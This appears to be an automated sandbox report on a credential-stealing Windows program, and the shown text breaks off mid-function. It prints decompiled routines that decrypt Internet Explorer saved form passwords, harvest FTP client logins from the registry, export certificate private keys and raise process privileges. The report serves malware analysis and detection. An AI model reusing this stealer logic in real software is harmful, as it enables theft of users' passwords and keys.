FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,*.*,?), ref: 00403FF6
lstrcmpiA.KERNEL32(00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 00404023
lstrcmpiA.KERNEL32(00414808,?,00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 00404040
FindNextFileA.KERNEL32(?,?,?,00000000,00000000,?,?,0000013E,?,*.*,?), ref: 0040410A
FindClose.KERNEL32(?,?,?,?,00000000,00000000,?,?,0000013E,?,*.*,?), ref: 0040411D

Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D

Strings

*.*, xrefs: 00403FC5
\*.*, xrefs: 00403FB6

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
String ID: *.*$\*.*
API String ID: 3040542784-1692270452
Opcode ID: e3bc355903d9d5b5cb0f98c3cee977bacf398a76d9c90776279f857e1b13ffde
Instruction ID: 0e5482085a8478f848b24922490d45c82c48751e20b01fa21e1f70377cfbccc4
Opcode Fuzzy Hash: e3bc355903d9d5b5cb0f98c3cee977bacf398a76d9c90776279f857e1b13ffde
Instruction Fuzzy Hash: 90413DB150010DAADF21AF61DC02BEE7B79AF84308F1080B7B609B54B1D77D9EA09B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A364, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 116
stringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0040A364(void* __ecx, intOrPtr _a4, WCHAR* _a8, short* _a12) {
				char _v24;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				void* _v64;
				char _v68;
				void* _v72;
				char _v76;
				void* _v80;
				char _v84;
				signed int _t50;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t80;
				signed int _t81;
				void* _t84;
				void* _t85;

				_t80 = __ecx;
				_t50 = lstrlenW(_a8);
				if(_t50 != 0) {
					E00403459(_t80, _a8, (_t50 << 1) + 2,  &_v24);
					_t81 = 0;
					_v48 = 0;
					while(_t81 < 0x14) {
						_v48 = _v48 + ( *(_t81 +  &_v24) & 0x000000ff);
						_t81 = _t81 + 1;
					}
					_t84 = 0;
					_v52 = 0;
					while(_t84 < 0x14) {
						_push( *(_t84 +  &_v24) & 0x000000ff);
						wsprintfA( &_v44, "%02X");
						_t85 = _t85 + 0xc;
						_v52 = E00401D69(_v52,  &_v44);
						_t84 = _t84 + 1;
					}
					_v48 = _v48 & 0x000000ff;
					_push(_v48);
					wsprintfA( &_v44, "%02X");
					_v52 = E00401D69(_v52,  &_v44);
					_t66 = E00401C8E( *0x4140fe, "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", _v52,  &_v56); // executed
					_t67 = _t66;
					if(_t67 != 0) {
						_v60 = _t67;
						if(_v56 != 0) {
							_v84 = (lstrlenW(_a8) << 1) + 2;
							_push(_a8);
							_pop( *_t30);
							_push(_v56);
							_pop( *_t32);
							_push(_v60);
							_pop( *_t34);
							_v72 = 0;
							if( *0x41442d != 0) {
								_push( &_v76);
								_push(1);
								_push(0);
								_push(0);
								_push( &_v84);
								_push(0);
								_push( &_v68);
								if( *0x41442d() != 0 && _v72 != 0) {
									if(_a12 != 0) {
										 *_a12 = 0x3f;
									}
									E0040A13B(0xbeef0003, _a8, _v72, _v76, _a4);
									LocalFree(_v72);
								}
							}
						}
						E004017D5(_v60);
					}
					return E004017D5(_v52);
				} else {
					return _t50;
				}
			}

0x0040a364
0x0040a373
0x0040a375
0x0040a38b
0x0040a390
0x0040a392
0x0040a3a0
0x0040a39c
0x0040a39f
0x0040a39f
0x0040a3a5
0x0040a3a7
0x0040a3d3
0x0040a3b1
0x0040a3bb
0x0040a3c0
0x0040a3cf
0x0040a3d2
0x0040a3d2
0x0040a3d8
0x0040a3df
0x0040a3eb
0x0040a3ff
0x0040a414
0x0040a419
0x0040a41b
0x0040a421
0x0040a428
0x0040a43b
0x0040a43e
0x0040a441
0x0040a444
0x0040a447
0x0040a44a
0x0040a44d
0x0040a450
0x0040a45e
0x0040a463
0x0040a464
0x0040a466
0x0040a468
0x0040a46d
0x0040a46e
0x0040a473
0x0040a47c
0x0040a488
0x0040a48d
0x0040a48d
0x0040a4a3
0x0040a4ab
0x0040a4ab
0x0040a47c
0x0040a45e
0x0040a4b3
0x0040a4b3
0x0040a4c2
0x0040a379
0x0040a379
0x0040a379

APIs

lstrlenW.KERNEL32(?), ref: 0040A36E
wsprintfA.USER32 ref: 0040A3EB
lstrlenW.KERNEL32(?,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,?,?,?,?,?,?), ref: 0040A431
CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040A474
LocalFree.KERNEL32(00000000,?,?), ref: 0040A4AB

Strings

Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 0040A409
%02X, xrefs: 0040A3B2, 0040A3E2

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$CryptDataFreeLocalUnprotectwsprintf
String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
API String ID: 1926481713-2450551051
Opcode ID: 10276d0c1c107ec45e6a45a57df5954478425b079aa56ba185906d5e51d0d003
Instruction ID: ee62826d35bb7334c94dec01f225b0295fce8fff2f3ff85087ea3677e24ce983
Opcode Fuzzy Hash: 10276d0c1c107ec45e6a45a57df5954478425b079aa56ba185906d5e51d0d003
Instruction Fuzzy Hash: BF414972810218EBDF119BE1EC45BEEBB79AF08314F04403AF910B51A1E7B89965DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00404FD8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404FD8(void* __ecx, intOrPtr _a4, char* _a8, intOrPtr _a12) {
				struct _WIN32_FIND_DATAA _v324;
				void* _v328;
				CHAR* _v332;
				char** _v336;
				char* _t31;
				void* _t40;

				_v332 = 0;
				_t31 = _a8;
				if(_t31 == 0 ||  *_t31 == 0) {
					L12:
					return E004017D5(_v332);
				} else {
					E00404F77(_a4, E00401D15(_a8, _a12)); // executed
					E004017D5(_t33);
					_v332 = E00401D15(_a8, "\*.*");
					E00401803( &_v324, 0x13e);
					_t40 = FindFirstFileA(_v332,  &_v324); // executed
					_v328 = _t40;
					if(_t40 + 1 == 0) {
						goto L12;
					} else {
						goto L4;
					}
					do {
						L4:
						if((_v324.dwFileAttributes & 0x00000010) != 0) {
							if(lstrcmpiA(0x414806,  &( &_v324->cFileName)) != 0) {
								if(lstrcmpiA(0x414808,  &( &_v324->cFileName)) != 0) {
									_v336 =  &( &_v324->cFileName);
									E00404F77(_a4, E00401D69(E00401D69(E00401D15(_a8, "\\"), _v336), _a12));
									E004017D5(_t53);
								}
							}
						}
					} while (FindNextFileA(_v328,  &_v324) != 0);
					FindClose(_v328);
					goto L12;
				}
			}

0x00404fe1
0x00404fee
0x00404ff0
0x00405100
0x0040510c
0x00404ffc
0x0040500c
0x00405011
0x00405023
0x00405035
0x00405047
0x0040504c
0x00405053
0x00000000
0x00000000
0x00000000
0x00000000
0x00405059
0x00405059
0x00405065
0x0040507d
0x00405097
0x004050a4
0x004050d1
0x004050d6
0x004050d6
0x00405097
0x0040507d
0x004050ed
0x004050fb
0x00000000
0x004050fb

APIs

FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,\*.*,00000000,?,?), ref: 00405047
lstrcmpiA.KERNEL32(00414806,?,00000000,?,?,0000013E,?,\*.*,00000000,?,?), ref: 00405076
lstrcmpiA.KERNEL32(00414808,?,00414806,?,00000000,?,?,0000013E,?,\*.*,00000000,?,?), ref: 00405090
FindNextFileA.KERNEL32(?,?,00000000,?,?,0000013E,?,\*.*,00000000,?,?), ref: 004050E8
FindClose.KERNEL32(?,?,?,00000000,?,?,0000013E,?,\*.*,00000000,?,?), ref: 004050FB

Strings

\*.*, xrefs: 00405016

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$Filelstrcmpi$CloseFirstNext
String ID: \*.*
API String ID: 3663067366-1173974218
Opcode ID: 40fde62e2cf87fb72ce1b3637c1eb9737dc98d1368d3ce461540d5087f7d7957
Instruction ID: b26a634762e2f79233f71d3dbaa1eefbd2c1f05767a16118d2fd1dfdcfdb69c5
Opcode Fuzzy Hash: 40fde62e2cf87fb72ce1b3637c1eb9737dc98d1368d3ce461540d5087f7d7957
Instruction Fuzzy Hash: 7731FE71800119AADF21AF61CC42BEE7779EF44308F5440B7B508B61B1D7789E909E99

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4C5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75
comCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040A4C5(intOrPtr _a4) {
				void* _v8;
				void* _v12;
				short _v44;
				WCHAR* _v48;
				char _v52;
				char _v56;
				short _v60;
				char* _t34;
				short* _t45;
				void* _t47;

				_t34 =  &_v8;
				_push(_t34);
				_push(0x415a7d);
				_push(5);
				_push(0);
				_push(0x415a6d); // executed
				L00410DD0(); // executed
				if(_t34 < 0) {
					L15:
					return E0040A364(_t47, _a4, L"http://www.facebook.com/", 0);
				}
				_push( &_v12);
				_push(_v8);
				if( *((intOrPtr*)( *_v8 + 0x1c))() < 0 || _v12 == 0) {
					L14:
					 *((intOrPtr*)( *_v8 + 8))(_v8);
					goto L15;
				} else {
					_v48 = 0;
					_v44 = 0;
					_v52 = 0x28;
					while(1) {
						_v56 = 0;
						_push( &_v56);
						_push( &_v52);
						_push(1);
						_push(_v12);
						if( *((intOrPtr*)( *_v12 + 0xc))() != 0 || _v56 != 1) {
							break;
						}
						if(_v48 != 0) {
							_t45 = StrStrIW(_v48, 0x415a9d);
							if(_t45 == 0) {
								_v60 = 0;
							} else {
								 *_t45 = 0;
								_v60 = _t45;
							}
							E0040A364(_t47, _a4, _v48, _v60); // executed
							_push(_v48);
							L00410DCA();
							if(_v44 != 0) {
								_push(_v44);
								L00410DCA();
							}
						}
					}
					 *((intOrPtr*)( *_v12 + 8))(_v12);
					goto L14;
				}
			}

0x0040a4cb
0x0040a4ce
0x0040a4cf
0x0040a4d4
0x0040a4d6
0x0040a4d8
0x0040a4dd
0x0040a4e4
0x0040a5aa
0x0040a5ba
0x0040a5ba
0x0040a4f2
0x0040a4f3
0x0040a4fb
0x0040a59f
0x0040a5a7
0x00000000
0x0040a50b
0x0040a50b
0x0040a512
0x0040a519
0x0040a520
0x0040a520
0x0040a52f
0x0040a533
0x0040a534
0x0040a536
0x0040a53e
0x00000000
0x00000000
0x0040a54a
0x0040a559
0x0040a55b
0x0040a567
0x0040a55d
0x0040a55d
0x0040a562
0x0040a562
0x0040a577
0x0040a57c
0x0040a57f
0x0040a588
0x0040a58a
0x0040a58d
0x0040a58d
0x0040a588
0x0040a592
0x0040a59c
0x00000000
0x0040a59c

APIs

CoCreateInstance.OLE32(00415A6D,00000000,00000005,00415A7D,?), ref: 0040A4DD
StrStrIW.SHLWAPI(00000000,00415A9D), ref: 0040A554
CoTaskMemFree.OLE32(00000000,00000000,00415A9D), ref: 0040A57F
CoTaskMemFree.OLE32(00000000,00000000,00000000,00415A9D), ref: 0040A58D

Strings

http://www.facebook.com/, xrefs: 0040A5AC
(, xrefs: 0040A519

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeTask$CreateInstance
String ID: ($http://www.facebook.com/
API String ID: 2903366249-3677894361
Opcode ID: 26fd28d9b999e4cc32093d22da46df2e4bc8434568c89ba86784230ad1d43a58
Instruction ID: e0fdaf64ef7de16aafdf2735d0d685e72c2ce6657ce01d53c8c3a7317b8eeee1
Opcode Fuzzy Hash: 26fd28d9b999e4cc32093d22da46df2e4bc8434568c89ba86784230ad1d43a58
Instruction Fuzzy Hash: BF310530A00209FBDF11DFA0DC85BCEBB75BF08348F248166E500BA290D3799A95DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00402896, Relevance: 7.6, APIs: 5, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00402896(CHAR* _a4, intOrPtr _a8) {
				struct _LUID _v12;
				void* _v16;
				int _v20;
				void* _v24;
				void* _v28;
				struct _TOKEN_PRIVILEGES _v32;
				int _t19;
				int _t28;
				void* _t30;

				if( *0x414421 == 0 ||  *0x414425 == 0 ||  *0x41440d == 0) {
					return 0;
				} else {
					_t30 = 0;
					_v16 = 0;
					_t19 = LookupPrivilegeValueA(0, _a4,  &_v12); // executed
					if(_t19 != 0) {
						if(OpenProcessToken(GetCurrentProcess(), 0x20,  &_v16) != 0) {
							_v32.PrivilegeCount = 1;
							 *_t7 = _v12.LowPart;
							_push(_v12.HighPart);
							_pop( *_t9);
							if(_a8 == 0) {
								_v20 = 0;
							} else {
								_v20 = 2;
							}
						}
						_t28 = AdjustTokenPrivileges(_v16, 0,  &_v32, 0x10, 0, 0); // executed
						if(_t28 != 0) {
							_t30 = _t30 + 1;
						}
					}
					if(_v16 != 0) {
						CloseHandle(_v16); // executed
					}
					return _t30;
				}
			}

0x004028a4
0x004028bc
0x004028bf
0x004028bf
0x004028c1
0x004028d1
0x004028d9
0x004028f1
0x004028f3
0x004028fd
0x00402900
0x00402903
0x0040290a
0x00402915
0x0040290c
0x0040290c
0x0040290c
0x0040290a
0x0040292b
0x00402933
0x00402935
0x00402935
0x00402933
0x0040293a
0x0040293f
0x0040293f
0x00402948
0x00402948

APIs

LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 004028D1
GetCurrentProcess.KERNEL32 ref: 004028DB
OpenProcessToken.ADVAPI32(00000000,00000020,00000000), ref: 004028E9
AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 0040292B
CloseHandle.KERNEL32(00000000), ref: 0040293F

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3038321057-0
Opcode ID: 76fe5268ac12f0dce08d9f682dd04652f32c605f293811f82a7e5bc11f3d74ac
Instruction ID: cba0a7666c283167117d827dc397d8696115836664d693015db956b6612b46f1
Opcode Fuzzy Hash: 76fe5268ac12f0dce08d9f682dd04652f32c605f293811f82a7e5bc11f3d74ac
Instruction Fuzzy Hash: 53116076A00209EBEB119F90ED4DBEE7BB8FB44309F148136A151B51E0D7F84694CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D423, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142
stringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0040D423(intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				CHAR** _v16;
				CHAR* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _t48;
				int _t50;
				int _t54;
				CHAR** _t59;
				CHAR** _t62;
				CHAR** _t66;
				CHAR** _t71;
				intOrPtr _t79;
				CHAR** _t81;
				void* _t82;

				_t79 = __edx;
				_v8 = E0040150D(_a4, 0x48, 0);
				if( *0x414431 != 0 &&  *0x414435 != 0 &&  *0x41443d != 0 &&  *0x4143f9 != 0 &&  *0x4143fd != 0 &&  *0x414401 != 0 &&  *0x414405 != 0 &&  *0x414439 != 0) {
					_t48 =  *0x414431(0, 0x416057); // executed
					_v12 = _t48;
					if(_v12 != 0) {
						_t82 = 0;
						while(1) {
							_t82 =  *0x414435(_v12, _t82);
							_t94 = _t82;
							if(_t82 == 0) {
								break;
							}
							_t79 =  *((intOrPtr*)(_t82 + 0xc));
							_v16 =  *((intOrPtr*)(_t79 + 0x68));
							_t81 =  *(_t79 + 0x6c);
							__eflags = _t81;
							if(__eflags != 0) {
								while(1) {
									__eflags = _v16;
									if(__eflags == 0) {
										goto L28;
									}
									_t50 = lstrcmpA( *_t81, "2.5.29.37");
									__eflags = _t50;
									if(_t50 == 0) {
										__eflags = _t81[2];
										if(_t81[2] != 0) {
											_v20 = E004017EC(_t81[2]);
											E00401823(_t81[3], _v20, _t81[2]);
											_t54 = lstrcmpA(_v20, 0x416064);
											__eflags = _t54;
											if(_t54 == 0) {
												_t59 =  *0x41443d(_t82, 0, 0,  &_v24,  &_v28, 0);
												__eflags = _t59;
												if(_t59 != 0) {
													_t62 =  *0x4143f9(_v24, _v28,  &_v32);
													__eflags = _t62;
													if(_t62 != 0) {
														_t66 =  *0x4143fd(_v32, 0, 7, 0, 0,  &_v36);
														__eflags = _t66;
														if(_t66 != 0) {
															_v40 = E004017EC(_v36);
															_t71 =  *0x4143fd(_v32, 0, 7, 0, _v40,  &_v36);
															__eflags = _t71;
															if(_t71 != 0) {
																E00401486(_a4, 0xbeef0000);
																E004014BC(_a4,  *((intOrPtr*)(_t82 + 4)),  *((intOrPtr*)(_t82 + 8)));
																E004014BC(_a4, _v40, _v36);
															}
															E004017D5(_v40);
														}
														 *0x414401(_v32);
													}
													 *0x414405(_v24, 0);
												}
											}
											E004017D5(_v20);
										}
									}
									_t81 =  &(_t81[4]);
									_t40 =  &_v16;
									 *_t40 = _v16 - 1;
									__eflags =  *_t40;
								}
							}
							L28:
						}
						 *0x414439(_v12, 0);
					}
				}
				return E00401553(_t79, _t94, _a4, _v8);
			}

APIs

CertOpenSystemStoreA.CRYPT32(00000000,00416057), ref: 0040D4A9
lstrcmpA.KERNEL32(?,2.5.29.37), ref: 0040D4F3

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

lstrcmpA.KERNEL32(?,00416064,00000000,?,00000000,00000000,?,2.5.29.37), ref: 0040D52B

Strings

2.5.29.37, xrefs: 0040D4EC

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcmp$AllocCertLocalOpenStoreSystem
String ID: 2.5.29.37
API String ID: 1553736721-3842544949
Opcode ID: 64adb788d90f03cf86861941f5e287a351f777ca5d64e8a737ecca4751077718
Instruction ID: b03ba2e338ee9a7ca6125fe278e81a7799858116ed9091dcfd2150a7fa4cb223
Opcode Fuzzy Hash: 64adb788d90f03cf86861941f5e287a351f777ca5d64e8a737ecca4751077718
Instruction Fuzzy Hash: 71516936900219FADF22AF90CC0ABEEBB71EB48304F148036F515751F0CB7A6995DB68

Uniqueness

Uniqueness Score: -1.00%

Function 00410B60, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
comCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00410B60(signed int __eax, void* __ecx, signed int __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				void* _t8;
				void* _t9;
				int _t13;
				signed int _t24;

				_t24 = __edx ^ __eax ^ __eax ^ __edx ^ __eax;
				_push(0); // executed
				L00410DD6(); // executed
				_t8 = E00402AF8(E00410331(E0040244F(), _t24), _t24); // executed
				_t9 = E00402B27(_t8, _t24); // executed
				_t10 = _t9;
				if(_t9 != 0 && E00402C05(_t10, _t24, _a4) != 0) {
					 *0x414616 = 1;
				}
				 *0x417695 = E004017EC(0x101);
				_v8 = 0x101;
				_t13 = GetUserNameA( *0x417695,  &_v8); // executed
				if(_t13 == 0) {
					E004017D5( *0x417695);
					 *0x417695 = 0; // executed
				}
				E00401FD8(_t24); // executed
				return E0041038A(E00401CBA(), _t24, "Mesoamerica");
			}

0x00410b6a
0x00410b6c
0x00410b6e
0x00410b7d
0x00410b82
0x00410b87
0x00410b89
0x00410b97
0x00410b97
0x00410bab
0x00410bb0
0x00410bc1
0x00410bc8
0x00410bd0
0x00410bd5
0x00410bd5
0x00410bdf
0x00410bf4

APIs

OleInitialize.OLE32(00000000), ref: 00410B6E
GetUserNameA.ADVAPI32(00000101,00000101), ref: 00410BC1

Strings

Mesoamerica, xrefs: 00410BE9
H$j, xrefs: 00410BAB, 00410BD5

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InitializeNameUser
String ID: H$j$Mesoamerica
API String ID: 2272643758-4180253440
Opcode ID: fca58cfdc3c7b01d0fe083cd0c9ee51238c257130a43fea9f7abb90a3e26fcd1
Instruction ID: 4cd0992862414466d0513175d6398bc8650a8c005d487a3a8098377ca90b23e8
Opcode Fuzzy Hash: fca58cfdc3c7b01d0fe083cd0c9ee51238c257130a43fea9f7abb90a3e26fcd1
Instruction Fuzzy Hash: B5F08C71608508AAE740FBB7DC03BCA35A26B4035CF00803BB418A91E3DEFC99C0966D

Uniqueness

Uniqueness Score: -1.00%

Function 00402896, Relevance: 6.1, APIs: 4, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402896(CHAR* _a4, intOrPtr _a8) {
				struct _LUID _v12;
				void* _v16;
				int _v20;
				void* _v24;
				void* _v28;
				struct _TOKEN_PRIVILEGES _v32;
				int _t19;
				void* _t23;
				int _t28;
				void* _t30;

				if( *0x414421 == 0 ||  *0x414425 == 0 ||  *0x41440d == 0) {
					return 0;
				} else {
					_t30 = 0;
					_v16 = 0;
					_t19 = LookupPrivilegeValueA(0, _a4,  &_v12); // executed
					if(_t19 != 0) {
						_t23 = GetCurrentProcess();
						_push( &_v16);
						_push(0x20);
						_push(_t23);
						if( *0x41440d() != 0) {
							_v32.PrivilegeCount = 1;
							 *_t7 = _v12.LowPart;
							_push(_v12.HighPart);
							_pop( *_t9);
							if(_a8 == 0) {
								_v20 = 0;
							} else {
								_v20 = 2;
							}
						}
						_t28 = AdjustTokenPrivileges(_v16, 0,  &_v32, 0x10, 0, 0); // executed
						if(_t28 != 0) {
							_t30 = _t30 + 1;
						}
					}
					if(_v16 != 0) {
						CloseHandle(_v16); // executed
					}
					return _t30;
				}
			}

0x004028a4
0x004028bc
0x004028bf
0x004028bf
0x004028c1
0x004028d1
0x004028d9
0x004028db
0x004028e5
0x004028e6
0x004028e8
0x004028f1
0x004028f3
0x004028fd
0x00402900
0x00402903
0x0040290a
0x00402915
0x0040290c
0x0040290c
0x0040290c
0x0040290a
0x0040292b
0x00402933
0x00402935
0x00402935
0x00402933
0x0040293a
0x0040293f
0x0040293f
0x00402948
0x00402948

APIs

LookupPrivilegeValueA.ADVAPI32(00000000,?,?,00000001), ref: 004028D1
GetCurrentProcess.KERNEL32 ref: 004028DB
AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 0040292B
CloseHandle.KERNEL32(00000000), ref: 0040293F

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AdjustCloseCurrentHandleLookupPrivilegePrivilegesProcessTokenValue
String ID:
API String ID: 1569164952-0
Opcode ID: 76fe5268ac12f0dce08d9f682dd04652f32c605f293811f82a7e5bc11f3d74ac
Instruction ID: cba0a7666c283167117d827dc397d8696115836664d693015db956b6612b46f1
Opcode Fuzzy Hash: 76fe5268ac12f0dce08d9f682dd04652f32c605f293811f82a7e5bc11f3d74ac
Instruction Fuzzy Hash: 53116076A00209EBEB119F90ED4DBEE7BB8FB44309F148136A151B51E0D7F84694CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 004057C2, Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 76
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004057C2(intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				long _t29;

				E00405662(_a4, _a8, "Pass", "Host", "User", "Port", "Remote Dir", "Server Type", 0xbeef0013); // executed
				E00405662(_a4, _a8, "Server.Pass", "Server.Host", "Server.User", "Server.Port", "Path", "ServerType", 0xbeef0013);
				E00405662(_a4, _a8, "Last Server Pass", "Last Server Host", "Last Server User", "Last Server Port", "Last Server Path", "Last Server Type", 0xbeef0014);
				_t29 = RegOpenKeyA( *0x4140fe, _a8,  &_v8);
				if(_t29 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D69(E00401D15(_a8, "\\"),  &_v2064);
						E004057C2(_a4, _v2068);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t29;
			}

0x004057f4
0x00405822
0x00405850
0x00405867
0x00405869
0x0040586b
0x00405872
0x00405872
0x00405899
0x00000000
0x00000000
0x004058b9
0x004058c8
0x004058d3
0x004058d8
0x004058d8
0x00000000
0x004058e0
0x004058e6

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00405862
RegEnumKeyExA.ADVAPI32 ref: 00405892
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004058E0

Strings

Last Server Pass, xrefs: 00405845
Server Type, xrefs: 004057D0
Server.Port, xrefs: 00405808
ServerType, xrefs: 004057FE
User, xrefs: 004057DF
Server.Host, xrefs: 00405812
Last Server Port, xrefs: 00405836
Pass, xrefs: 004057E9
Port, xrefs: 004057DA
Last Server Host, xrefs: 00405840
Server.User, xrefs: 0040580D
Server.Pass, xrefs: 00405817
Last Server User, xrefs: 0040583B
Last Server Type, xrefs: 0040582C
Path, xrefs: 00405803
Host, xrefs: 004057E4
Remote Dir, xrefs: 004057D5
Last Server Path, xrefs: 00405831

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Host$Last Server Host$Last Server Pass$Last Server Path$Last Server Port$Last Server Type$Last Server User$Pass$Path$Port$Remote Dir$Server Type$Server.Host$Server.Pass$Server.Port$Server.User$ServerType$User
API String ID: 1332880857-44262141
Opcode ID: 7f12ac45495d943ba66f7febdcad9f06d4ab2866eb6c7f588459603effe77e1f
Instruction ID: 485885c6e778c5f0ce236eab50da9cdf0f754c6351278a17f13cbc202cb47549
Opcode Fuzzy Hash: 7f12ac45495d943ba66f7febdcad9f06d4ab2866eb6c7f588459603effe77e1f
Instruction Fuzzy Hash: 29213B35680208BADF216E91EC12FDD7A75AB84B04F20C467B605751E1DBBD5A90AF4C

Uniqueness

Uniqueness Score: -1.00%

Function 00401FD8, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 172
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00401FD8(void* __edx) {
				void* _v8;
				char _v4104;
				int _v4108;
				int _v4112;
				char _v4116;
				char _v4120;
				int _v4124;
				void* _v4128;
				intOrPtr _v4132;
				long _t56;
				void** _t60;
				void* _t61;
				void* _t63;
				void* _t65;
				void* _t71;
				long _t76;
				void* _t80;
				intOrPtr _t83;
				void* _t85;
				void* _t86;
				void* _t90;
				void* _t91;
				void* _t102;
				void* _t112;
				void* _t115;
				void* _t120;

				_t111 = __edx;
				if( *0x414082 != 0) {
					E004017D5( *0x414082);
					 *0x414082 = 0;
				}
				if( *0x414086 != 0) {
					E004017D5( *0x414086);
					 *0x414086 = 0;
				}
				E00401000( &_v4116, _t111,  &_v4116); // executed
				E00401000( &_v4120, _t111,  &_v4120);
				_t56 = RegOpenKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall",  &_v8); // executed
				if(_t56 != 0) {
					L19:
					E00401486(_v4116, 0);
					E00401486(_v4120, 0);
					_t60 =  &_v4128;
					_push(_t60);
					_push(_v4116);
					L00410DBE();
					if(_t60 >= 0) {
						_v4124 = E0040106A(_t60, _t111, _v4116);
						 *0x414082 = E004017EC(_v4124);
						_t71 = GlobalLock(_v4128);
						if(_t71 != 0) {
							_t115 =  *0x414082; // 0x0
							memcpy(_t115, _t71, _v4124);
							_t120 = _t120 + 0xc;
							GlobalUnlock(_v4128);
						}
					}
					_t61 =  &_v4128;
					_push(_t61);
					_push(_v4120);
					L00410DBE();
					if(_t61 >= 0) {
						_v4124 = E0040106A(_t61, _t111, _v4120);
						_t65 = E004017EC(_v4124); // executed
						 *0x414086 = _t65;
						_t61 = GlobalLock(_v4128);
						if(_t61 != 0) {
							_t112 =  *0x414086; // 0x0
							memcpy(_t112, _t61, _v4124);
							_t61 = GlobalUnlock(_v4128);
						}
					}
